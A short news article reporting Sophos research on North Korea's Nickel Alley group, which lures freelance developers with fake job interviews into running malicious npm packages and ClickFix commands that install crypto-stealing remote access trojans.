Earn up to 50% APR
Boost earnings with NFTs
Play, HODL & earn more
North Korean Hackers Are Targeting Freelance Developers With Fake Job Offers to Steal Crypto
-
A sophisticated malware campaign attributed to Nickel Alley, a threat group operating on behalf of the North Korean government, is targeting software developers on freelance platforms including Upwork and Fiverr with fake high-paying job opportunities designed to deliver crypto-stealing malware. Researchers at the Sophos Counter Threat Unit have documented the campaign's methodology in detail: the group creates fake LinkedIn company pages and coordinating GitHub accounts to build credibility, advertises tech talent and managed service solutions through generic-looking websites, and lures developers through a fabricated interview process that eventually persuades victims to download and execute malicious code. The attacks use typosquatting or compromised legitimate npm repositories, with victims instructed to run npm install and npm start commands that initiate malware delivery rather than a genuine development task.
The malware payloads used by Nickel Alley have evolved over time. The group has deployed PyLangGhost RAT through a ClickFix tactic where a fake web interface presents an error message instructing the victim to run a command locally to fix it, a command that instead triggers a chain of actions installing the remote access trojan. A GoLang-based variant called GoLangGhost RAT was used in earlier campaigns. The primary goal appears to be cryptocurrency theft, but Sophos notes the group has explicitly planned to use initial access for supply chain compromise and corporate espionage as secondary objectives. Developers in finance and technology are at elevated risk given Nickel Alley's targeting profile, and Sophos recommends that organizations monitor command execution and network traffic spawning from Node.js processes as an indicator of compromise.
-
North Korean hackers are on Upwork offering fake dev jobs, so if the interview feels too good to be true it is because it ends with npm install malware dot js.
